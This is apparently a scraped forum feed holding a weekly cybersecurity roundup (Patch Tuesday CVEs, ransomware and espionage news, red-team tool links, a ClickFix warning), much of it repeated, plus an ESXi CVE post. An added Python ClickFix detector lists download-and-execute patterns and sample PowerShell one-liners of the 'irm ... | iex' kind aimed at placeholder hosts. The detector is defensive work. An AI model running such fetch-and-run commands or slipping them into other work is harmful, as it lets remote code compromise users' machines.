Six of the seven 0-days were being publicly exploited (yay!). I won't list all of them, but the critical security updates are:<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24983" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24983</a> - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24984" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24984</a> - Windows NTFS Information Disclosure Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24985" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24985</a> - Windows Fast FAT File System Driver Remote Code Execution Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24991" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24991</a> - Windows NTFS Information Disclosure Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24993" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24993</a> - Windows NTFS Remote Code Execution Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26633" target="_blank" rel="noopener" class="mycode_url">CVE-2025-26633</a> - Microsoft Management Console Security Feature Bypass Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26630" target="_blank" rel="noopener" class="mycode_url">CVE-2025-26630</a> - Microsoft Access Remote Code Execution Vulnerability<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk: </span></span>Fortinet released a number of patches for a slew of their products, some of which are high severity (again). </span><br />
Double check your devices here: <a href="https://www.fortiguard.com/psirt" target="_blank" rel="noopener" class="mycode_url">https://www.fortiguard.com/psirt</a><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #c10300;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">High Risk:</span> </span>Hackers are using an old vulnerability to pop Cisco Small Business Routers.</span> <br />
CISA added <a href="https://www.cve.org/CVERecord?id=CVE-2023-20118" target="_blank" rel="noopener" class="mycode_url">CVE-2023-20118 </a> to its known exploited vulnerabilities catalog this week, meaning the bad guys are bad guying a 2-year-old vulnerability. <br />
Check out Cisco’s Security Advisory here <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5" target="_blank" rel="noopener" class="mycode_url">https://sec.cloudapps.cisco.com/security...n-ej76Pke5</a><br />
 <br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/TVVm7lW.png" loading="lazy"  alt="[Image: TVVm7lW.png]" class="mycode_img" /></div>
<br />
Researchers have noted a 42% increase in Medusa ransomware attacks from 2023 to 2024, with incidents doubling in early 2025. Medusa, operated as a ransomware-as-a-service (RaaS) by the group tracked as Spearwing, employs double extortion tactics, stealing and encrypting data.<br />
<a href="https://www.security.com/threat-intelligence/medusa-ransomware-attacks" target="_blank" rel="noopener" class="mycode_url">https://www.security.com/threat-intellig...re-attacks</a><br />
 <br />
Silk Typhoon, a Chinese espionage group, is now using common IT tools for initial access, exploiting unpatched applications to escalate privileges within targeted organizations. After gaining access, they steal credentials to infiltrate networks and abuse various applications, including Microsoft services, for espionage. Microsoft's threat intelligence has detailed these tactics and offers security solutions and mitigation guidance to defend against these attacks.<br />
<a href="https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/" target="_blank" rel="noopener" class="mycode_url">https://www.microsoft.com/en-us/security...ply-chain/</a><br />
 <br />
Google Cloud CISO Phil Venables applies Jim Collins' flywheel concept to amplifying the effects of our security programs, walking through seven potential security flywheels. Those of you in a leadership role inside or outside cybersecurity should give this a read.<br />
<a href="https://www.philvenables.com/post/turning-the-security-flywheel" target="_blank" rel="noopener" class="mycode_url">https://www.philvenables.com/post/turnin...y-flywheel</a><br />
 <br />
A two-year joint effort by Fortra, Microsoft's Digital Crimes Unit, and Health-ISAC has significantly disrupted ransomware operations by targeting the illicit use of Cobalt Strike and compromised Microsoft software. This campaign achieved an 80% reduction in unauthorized Cobalt Strike copies and seized over 200 malicious domains, drastically shortening the time between detecting and dismantling attacks to under a week in the U.S. and under two weeks globally.<br />
<a href="https://www.cobaltstrike.com/blog/update-stopping-cybercriminals-from-abusing-cobalt-strike" target="_blank" rel="noopener" class="mycode_url">https://www.cobaltstrike.com/blog/update...alt-strike</a><br />
 <br />
<hr class="mycode_hr" />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/EEG6FZS.png" loading="lazy"  alt="[Image: EEG6FZS.png]" class="mycode_img" /></div>
<br />
FBI Watchdog is a cyber threat intelligence OSINT tool that monitors domain DNS changes in real-time, specifically detecting law enforcement seizures. It alerts users via Telegram and Discord and captures screenshots of seized domains.<br />
<a href="https://github.com/DarkWebInformer/FBI_Watchdog" target="_blank" rel="noopener" class="mycode_url">https://github.com/DarkWebInformer/FBI_Watchdog</a><br />
 <br />
APT-ATTACK-SIMULATION is a compilation of APT simulations (Russia, China, Iran, North Korea) that target many vital sectors, both private and governmental, including written tools, C2 servers, backdoors, exploitation techniques, stagers, bootloaders, and many other tools that attackers might have used in actual attacks.<br />
<a href="https://github.com/S3N4T0R-0X0/APT-Attack-Simulation" target="_blank" rel="noopener" class="mycode_url">https://github.com/S3N4T0R-0X0/APT-Attack-Simulation</a><br />
 <br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/JkUpDIt.png" loading="lazy"  alt="[Image: JkUpDIt.png]" class="mycode_img" /></div>
<br />
A tool created for the red team to test default credentials on SSH and WinRM and then execute scripts if logging in was successful.<br />
<a href="https://github.com/RITRedteam/StreetCred" target="_blank" rel="noopener" class="mycode_url">https://github.com/RITRedteam/StreetCred</a><br />
<br />
CaptainCredz is a modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.<br />
<a href="https://github.com/synacktiv/captaincredz" target="_blank" rel="noopener" class="mycode_url">https://github.com/synacktiv/captaincredz</a><br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size"><img src="https://i.imgur.com/p227pSB.png" loading="lazy"  alt="[Image: p227pSB.png]" class="mycode_img" /></span></span></div>
<br />
Here is a spot where I’ll just generally soapbox when I want to. <br />
 <br />
This week I’ve had some discussions around two specific issues. One being regulation, specifically around CMMC, and the other being a new vector that attackers are using that is wildly successful despite it being incredibly obvious that it is bad. <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">CMMC sucks and it's not going anywhere for 4 more years</span></span><br />
 <br />
Let's first address regulatory compliance, specifically the Cybersecurity Maturity Model Certification (CMMC). For you non-US readers, CMMC is a framework designed to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB), a critical sector for national security. It aims to standardize and verify the implementation of cybersecurity best practices across all tiers of the supply chain, from essential support services to advanced research and development.<br />
 <br />
The anticipated release of the latest CMMC version has been delayed, likely until the next administration. This delay creates a significant challenge: a regulatory vacuum. This vacuum introduces ambiguity, hindering long-term strategic planning and investment in cybersecurity initiatives. Risk owners, from Directors to C-suite executives, are navigating the whiplash of shifting priorities, facing the difficult task of justifying resource allocation amidst regulatory uncertainty. The substantial resource allocation required for CMMC implementation, encompassing not only technology upgrades but also process redesign and workforce training, has been abruptly disrupted. This leaves internal CMMC champions, often IT and security leaders, facing skepticism and uncertainty from other stakeholders who may question the ROI of continued investment.<br />
 <br />
The resulting impact is a diminished perceived authority of cybersecurity regulations, particularly within the DIB. This uncertainty risks eroding future compliance efforts, potentially leading to continued resistance to essential security measures, such as multi-factor authentication, robust encryption, and continuous monitoring. In a rapidly evolving threat landscape, such resistance can significantly increase an organization's vulnerability.<br />
 <br />
This situation underscores the critical need for organizations to maintain a proactive and adaptable cybersecurity strategy, regardless of regulatory fluctuations. IT professionals must advocate for a risk-based approach, prioritizing security controls that align with industry best practices and address the most critical threats. This includes fostering a culture of security awareness, implementing robust security architectures, and establishing continuous monitoring and incident response capabilities. It is also essential to maintain open communication with stakeholders, demonstrating the ongoing value of cybersecurity investments and aligning security initiatives with broader business objectives. <br />
<br />
<span style="font-style: italic;" class="mycode_i">TL;DR: CMMC delays create regulatory uncertainty, impacting cybersecurity budgets and adoption. IT pros must advocate for proactive security despite shifting regulations.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">Please stop running malicious code willingly</span></span><br />
 <br />
If you're in Incident Response, you've probably seen a rise in this weird attack called 'ClickFix.' If not, buckle up for a wild ride! It's surprisingly simple, and that's why it's working. Here's how it goes:<ul class="mycode_list"><li>Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.<br />
</li>
<li>Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.<br />
</li>
</ul>
<br />
Yeah, it's working. And here's the kicker: it's hitting a specific group of users. Think back to the Windows 95 days. We used to tinker with everything—backgrounds, sounds, even HTML for our MySpace profiles. We broke stuff, fixed it, learned. Everyone did it.<br />
<br />
Then came the iPad generation. They got locked-down devices, limited customization. They never played with command lines, never saw what 'Start &gt; Run &gt; cmd' did. They don't know what PowerShell is, let alone why running random code in it is a huge red flag.<br />
<br />
So, when they see a pop-up telling them to run a long code in a terminal, they don't get that 'uh-oh' feeling. It looks normal, or at least not dangerous.<br />
 <br />
That's how people are getting tricked into running malicious code. They just don't know any better. This whole thing highlights a big problem: our security training isn't keeping up with how users have changed. We've got to show them how to spot red flags and get them asking questions. And, you know, maybe bring back a little bit of that healthy skepticism we all used to have.<br />
<br />
<span style="font-style: italic;" class="mycode_i">TL;DR: "ClickFix" attack tricks users into running bad code in PowerShell. They don't know it's dangerous because of how they grew up with computers.</span><br />
<br />
<br />
That's it for this week. Thanks for reading, y'all. See you next week. <br />
<br />
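An added example, not from gibby's post and not any vendor's rule set: a small Python detector for the ClickFix pattern described in the soapbox above (and the "keep an eye on ClickFix" note in the 4/4 roundup). It models two Windows log sources, process creation (Sysmon Event ID 1 / Security 4688) and PowerShell Script Block Logging (event 4104, which needs to be enabled by policy to capture full content), because a lure pasted into an already-open PowerShell window never creates a new process and only shows up in 4104. The parent-process lists, the cradle regexes, the treatment of an empty 4104 Path as interactive input, the .invalid hostnames and every sample event are assumptions constructed for this example.

```python
"""Flag ClickFix-shaped activity in Windows telemetry.

Two record kinds are modelled: process creation (Sysmon Event ID 1 or
Security 4688) and PowerShell Script Block Logging (event 4104). The cradle
patterns and the sample events are assumptions made for this example.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents a person launches an interpreter from (Start menu, Win+R, a console).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe", "conhost.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Fetch-and-run constructs typical of pasted lures (illustrative, not exhaustive).
CRADLES = {
    "web cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b"
        r".*\b(iex|invoke-expression)\b", re.I | re.S),
    "mshta remote": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    "encoded command": re.compile(r"-(enc|encodedcommand|ec)\s+[A-Za-z0-9+/=]{40,}", re.I),
}
# Flags that hide the window or skip profile/policy, common in the pasted one-liners.
EVASION = re.compile(
    r"-(w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(ep|executionpolicy)\s+bypass", re.I)


@dataclass
class Event:
    source: str          # "process" or "scriptblock"
    text: str            # command line, or the logged script block text
    image: str = ""      # process events: created image name
    parent: str = ""     # process events: parent image name
    path: str = ""       # 4104 events: script path; empty when typed or pasted (assumption)


@dataclass
class Finding:
    event: Event
    reasons: List[str] = field(default_factory=list)


def cradle_hits(text: str) -> List[str]:
    return [name for name, rx in CRADLES.items() if rx.search(text)]


def assess(ev: Event) -> Optional[Finding]:
    """Return a Finding when the event looks like a human pasted a fetch-and-run lure."""
    hits = cradle_hits(ev.text)
    if not hits:
        return None
    reasons = [f"fetch-and-run construct: {h}" for h in hits]
    if EVASION.search(ev.text):
        reasons.append("window hiding / execution policy bypass flags")
    if ev.source == "scriptblock":
        # Pasted into an already-open PowerShell window, nothing new is spawned,
        # so 4104 is the only record. A script run from disk carries its path;
        # interactive input does not.
        if ev.path:
            return None
        reasons.append("script block came from interactive input, not a file")
        return Finding(ev, reasons)
    if ev.image.lower() in INTERPRETERS and ev.parent.lower() in INTERACTIVE_PARENTS:
        reasons.append(f"{ev.image} spawned by interactive parent {ev.parent}")
        return Finding(ev, reasons)
    # A cradle under a service or agent parent deserves a look, but is not ClickFix-shaped.
    return None


def detect(events: List[Event]) -> List[Finding]:
    return [f for f in (assess(e) for e in events) if f is not None]


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Pasted into an open PowerShell window: only 4104 sees the content.
    Event("scriptblock", "iwr https://update-check.invalid/fix.ps1 -UseBasicParsing | iex"),
    # A legitimate bootstrap script run from disk that also uses iwr | iex.
    Event("scriptblock", "iwr https://internal.invalid/tool.ps1 | iex", path=r"C:\Tools\bootstrap.ps1"),
    # Interpreter launched from Explorer (Start menu / Win+R) with the lure inline.
    Event("process", 'powershell -w hidden -ep bypass -c "irm https://verify.invalid/a | iex"',
          image="powershell.exe", parent="explorer.exe"),
    # Same flags, but launched by a service: management agents look like this.
    Event("process", "powershell -w hidden -enc " + "A" * 60, image="powershell.exe", parent="svchost.exe"),
    # Ordinary interactive use.
    Event("process", "powershell.exe Get-Process", image="powershell.exe", parent="windowsterminal.exe"),
    # mshta pulling a remote HTA from an interactive parent.
    Event("process", "mshta https://captcha-check.invalid/ok.hta", image="mshta.exe", parent="explorer.exe"),
]


def summarize(findings: List[Finding]) -> List[str]:
    return [f"[{f.event.source}] {f.event.text[:50]!r}: " + "; ".join(f.reasons) for f in findings]


if __name__ == "__main__":
    for line in summarize(detect(SAMPLE_EVENTS)):
        print(line)
```

Run as a script it prints three findings (the pasted 4104 block, the Explorer-launched PowerShell one-liner, and the mshta launch) and stays quiet on the on-disk script, the service-launched encoded command and plain interactive use. Admin one-liners will trip the cradle regexes in real environments, which is exactly why the parent-process and script-path checks carry the decision rather than the regex alone.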
<div style="text-align: right;" class="mycode_align"><img src="https://i.imgur.com/nDIfEKX.png" loading="lazy"  alt="[Image: nDIfEKX.png]" class="mycode_img" /></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: right;" class="mycode_align"><img src="https://i.imgur.com/nDIfEKX.png" loading="lazy"  alt="[Image: nDIfEKX.png]" class="mycode_img" /></div>
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/O0zT3Ar.png" loading="lazy"  alt="[Image: O0zT3Ar.png]" class="mycode_img" /></div>
<br />
Hi everyone and welcome to the first edition of Gibby’s cybersecurity roundup. Each week, I’ll compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.<br />
<br />
I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:<ul class="mycode_list"><li>TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about <a href="https://www.cisa.gov/news-events/news/traffic-light-protocol-tlp-definitions-and-usage" target="_blank" rel="noopener" class="mycode_url">TLP, and its classification levels, here</a><br />
</li>
<li>Blue Team - The Security Team focused on Defense and Detection<br />
</li>
<li>Red team - The Security Team focused on Attacks and Evasion <br />
</li>
</ul>
<br />
If you want to see something added here let me know! <br />
<br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/plvm6YX.png" loading="lazy"  alt="[Image: plvm6YX.png]" class="mycode_img" /></div>
<br />
First, lets get started with this weeks new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones. <br />
<br />
<span style="color: #c10300;" class="mycode_color"><span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">High Risk:</span></span></span><span style="font-size: medium;" class="mycode_size"> Publicly facing VMware ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor. </span><br />
Find the Q&amp;A about this here: <a href="https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004" target="_blank" rel="noopener" class="mycode_url">https://github.com/vmware/vcf-security-a...-2025-0004</a><br />
And more information about the vulnerability here: <a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390" target="_blank" rel="noopener" class="mycode_url">https://support.broadcom.com/web/ecx/sup...es/0/25390</a><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #c10300;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">High Risk:</span> </span>Microsoft Patch Tuesday fixes seven 0-days and fifty-seven security flaws. </span><br />
Six of the seven 0-days were being publicly exploited (yay!). I won't list all of them, but the critical security updates are:<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24983" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24983</a> - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24984" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24984</a> - Windows NTFS Information Disclosure Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24985" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24985</a> - Windows Fast FAT File System Driver Remote Code Execution Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24991" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24991</a> - Windows NTFS Information Disclosure Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24993" target="_blank" rel="noopener" class="mycode_url">CVE-2025-24993</a> - Windows NTFS Remote Code Execution Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26633" target="_blank" rel="noopener" class="mycode_url">CVE-2025-26633</a> - Microsoft Management Console Security Feature Bypass Vulnerability<br />
<a href="http://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26630" target="_blank" rel="noopener" class="mycode_url">CVE-2025-26630</a> - Microsoft Access Remote Code Execution Vulnerability<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #c10300;" class="mycode_color">High Risk: </span></span>Fortinet released a number of patches for a slew of their products, some of which are high severity (again). </span><br />
Double check your devices here: <a href="https://www.fortiguard.com/psirt" target="_blank" rel="noopener" class="mycode_url">https://www.fortiguard.com/psirt</a><br />
<br />
<br />
<br />
<span style="font-size: large;" class="mycode_size"><span style="color: #c10300;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">High Risk:</span> </span>Hackers are using an old vulnerability to pop Cisco Small Business Routers.</span> <br />
CISA added <a href="https://www.cve.org/CVERecord?id=CVE-2023-20118" target="_blank" rel="noopener" class="mycode_url">CVE-2023-20118</a> to its known exploited vulnerabilities catalog this week, meaning the bad guys are bad guying a 2-year-old vulnerability. <br />
Check out Cisco’s Security Advisory here <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5" target="_blank" rel="noopener" class="mycode_url">https://sec.cloudapps.cisco.com/security...n-ej76Pke5</a><br />
 <br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/TVVm7lW.png" loading="lazy"  alt="[Image: TVVm7lW.png]" class="mycode_img" /></div>
<br />
Researchers have noted a 42% increase in Medusa ransomware attacks from 2023 to 2024, with incidents doubling in early 2025. Medusa, operated as a ransomware-as-a-service (RaaS) by the group tracked as Spearwing, employs double-extortion tactics, stealing and encrypting data.<br />
<a href="https://www.security.com/threat-intelligence/medusa-ransomware-attacks" target="_blank" rel="noopener" class="mycode_url">https://www.security.com/threat-intellig...re-attacks</a><br />
 <br />
Silk Typhoon, a Chinese espionage group, is now using common IT tools for initial access, exploiting unpatched applications to escalate privileges within targeted organizations. After gaining access, they steal credentials to infiltrate networks and abuse various applications, including Microsoft services, for espionage. Microsoft's threat intelligence has detailed these tactics and offers security solutions and mitigation guidance to defend against these attacks.<br />
<a href="https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/" target="_blank" rel="noopener" class="mycode_url">https://www.microsoft.com/en-us/security...ply-chain/</a><br />
 <br />
Google Cloud CISO Phil Venables applies Jim Collins' flywheel concept to amplifying the effects of our security programs, walking through seven potential security flywheels. Those of you in a leadership role inside or outside cybersecurity should give this a read.<br />
<a href="https://www.philvenables.com/post/turning-the-security-flywheel" target="_blank" rel="noopener" class="mycode_url">https://www.philvenables.com/post/turnin...y-flywheel</a><br />
 <br />
A two-year joint effort by Fortra, Microsoft's Digital Crimes Unit, and Health-ISAC has significantly disrupted ransomware operations by targeting the illicit use of Cobalt Strike and compromised Microsoft software. This campaign achieved an 80% reduction in unauthorized Cobalt Strike copies and seized over 200 malicious domains, drastically shortening the time between detecting and dismantling attacks to under a week in the U.S. and under two weeks globally.<br />
<a href="https://www.cobaltstrike.com/blog/update-stopping-cybercriminals-from-abusing-cobalt-strike" target="_blank" rel="noopener" class="mycode_url">https://www.cobaltstrike.com/blog/update...alt-strike</a><br />
 <br />
<hr class="mycode_hr" />
 <br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/EEG6FZS.png" loading="lazy"  alt="[Image: EEG6FZS.png]" class="mycode_img" /></div>
<br />
FBI Watchdog is a cyber threat intelligence OSINT tool that monitors domain DNS changes in real-time, specifically detecting law enforcement seizures. It alerts users via Telegram and Discord and captures screenshots of seized domains.<br />
<a href="https://github.com/DarkWebInformer/FBI_Watchdog" target="_blank" rel="noopener" class="mycode_url">https://github.com/DarkWebInformer/FBI_Watchdog</a><br />
 <br />
APT-ATTACK-SIMULATION is a compilation of APT simulations (Russia, China, Iran, North Korea) that target many vital sectors, both private and governmental, including written tools, C2 servers, backdoors, exploitation techniques, stagers, bootloaders, and many other tools that attackers might have used in actual attacks.<br />
<a href="https://github.com/S3N4T0R-0X0/APT-Attack-Simulation" target="_blank" rel="noopener" class="mycode_url">https://github.com/S3N4T0R-0X0/APT-Attack-Simulation</a><br />
 <br />
<hr class="mycode_hr" />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgur.com/JkUpDIt.png" loading="lazy"  alt="[Image: JkUpDIt.png]" class="mycode_img" /></div>
<br />
A tool created for the red team to test default credentials on SSH and WinRM and then execute scripts if logging in was successful.<br />
<a href="https://github.com/RITRedteam/StreetCred" target="_blank" rel="noopener" class="mycode_url">https://github.com/RITRedteam/StreetCred</a><br />
<br />
CaptainCredz is a modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.<br />
<a href="https://github.com/synacktiv/captaincredz" target="_blank" rel="noopener" class="mycode_url">https://github.com/synacktiv/captaincredz</a><br />
 <br />
<hr class="mycode_hr" />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size"><img src="https://i.imgur.com/p227pSB.png" loading="lazy"  alt="[Image: p227pSB.png]" class="mycode_img" /></span></span></div>
<br />
Here is a spot where I’ll just generally soapbox when I want to. <br />
 <br />
This week I’ve had some discussions around two specific issues. One being regulation, specifically around CMMC, and the other being a new vector that attackers are using that is wildly successful despite it being incredibly obvious that it is bad. <br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">CMMC Sucks and it's not going anywhere for 4 more years</span></span><br />
 <br />
Let's first address regulatory compliance, specifically the Cybersecurity Maturity Model Certification (CMMC). For you non-US readers, CMMC is a framework designed to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB), a critical sector for national security. It aims to standardize and verify the implementation of cybersecurity best practices across all tiers of the supply chain, from essential support services to advanced research and development.<br />
 <br />
The anticipated release of the latest CMMC version has been delayed, likely until the next administration. This delay creates a significant challenge: a regulatory vacuum. This vacuum introduces ambiguity, hindering long-term strategic planning and investment in cybersecurity initiatives. Risk owners, from Directors to C-suite executives, are navigating the whiplash of shifting priorities, facing the difficult task of justifying resource allocation amidst regulatory uncertainty. The substantial resource allocation required for CMMC implementation, encompassing not only technology upgrades but also process redesign and workforce training, has been abruptly disrupted. This leaves internal CMMC champions, often IT and security leaders, facing skepticism and uncertainty from other stakeholders who may question the ROI of continued investment.<br />
 <br />
The resulting impact is a diminished perceived authority of cybersecurity regulations, particularly within the DIB. This uncertainty risks eroding future compliance efforts, potentially leading to continued resistance to essential security measures, such as multi-factor authentication, robust encryption, and continuous monitoring. In a rapidly evolving threat landscape, such resistance can significantly increase an organization's vulnerability.<br />
 <br />
This situation underscores the critical need for organizations to maintain a proactive and adaptable cybersecurity strategy, regardless of regulatory fluctuations. IT professionals must advocate for a risk-based approach, prioritizing security controls that align with industry best practices and address the most critical threats. This includes fostering a culture of security awareness, implementing robust security architectures, and establishing continuous monitoring and incident response capabilities. It is also essential to maintain open communication with stakeholders, demonstrating the ongoing value of cybersecurity investments and aligning security initiatives with broader business objectives. <br />
<br />
<span style="font-style: italic;" class="mycode_i">TL;DR: CMMC delays create regulatory uncertainty, impacting cybersecurity budgets and adoption. IT pros must advocate for proactive security despite shifting regulations.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size">Please stop running malicious code willingly</span></span><br />
 <br />
If you're in Incident Response, you've probably seen a rise in this weird attack called 'ClickFix.' If not, buckle up for a wild ride! It's surprisingly simple, and that's why it's working. Here's how it goes:<ul class="mycode_list"><li>Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.<br />
</li>
<li>Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.<br />
</li>
</ul>
<br />
Yeah, it's working. And here's the kicker: it's hitting a specific group of users. Think back to the Windows 95 days. We used to tinker with everything—backgrounds, sounds, even HTML for our MySpace profiles. We broke stuff, fixed it, learned. Everyone did it.<br />
<br />
Then came the iPad generation. They got locked-down devices, limited customization. They never played with command lines, never saw what 'Start &gt; Run &gt; cmd' did. They don't know what PowerShell is, let alone why running random code in it is a huge red flag.<br />
<br />
So, when they see a pop-up telling them to run a long piece of code in a terminal, they don't get that 'uh-oh' feeling. It looks normal, or at least not dangerous.<br />
 <br />
That's how people are getting tricked into running malicious code. They just don't know any better. This whole thing highlights a big problem: our security training isn't keeping up with how users have changed. We've got to show them how to spot red flags and get them asking questions. And, you know, maybe bring back a little bit of that healthy skepticism we all used to have.<br />
<br />
<span style="font-style: italic;" class="mycode_i">TL;DR: "ClickFix" attack tricks users into running bad code in PowerShell. They don't know it's dangerous because of how they grew up with computers.</span><br />
<br />
<br />
That's it for this week. Thanks for reading, y'all. See you next week. <br />
<br />
<div style="text-align: right;" class="mycode_align"><img src="https://i.imgur.com/nDIfEKX.png" loading="lazy"  alt="[Image: nDIfEKX.png]" class="mycode_img" /></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Who's affected by the recent zero-day vulnerabilities in ESXi?]]></title>
			<link>https://dotheneedful.online/forums/showthread.php?tid=22</link>
			<pubDate>Wed, 12 Mar 2025 03:30:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dotheneedful.online/forums/member.php?action=profile&uid=4">mistiry</a>]]></dc:creator>
			<guid isPermaLink="false">https://dotheneedful.online/forums/showthread.php?tid=22</guid>
			<description><![CDATA[See: <a href="https://www.rapid7.com/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/" target="_blank" rel="noopener" class="mycode_url">https://www.rapid7.com/blog/post/2025/03...-products/</a><br />
<ul class="mycode_list"><li>CVE-2025-22224 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" rel="noopener" class="mycode_url">CVSS 9.3</a>): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine's VMX process running on the host.<br />
</li>
<li>CVE-2025-22225 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" rel="noopener" class="mycode_url">CVSS 8.2</a>): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.<br />
</li>
<li>CVE-2025-22226 (<a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" target="_blank" rel="noopener" class="mycode_url">CVSS 7.1</a>): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.<br />
</li>
</ul>
<br />
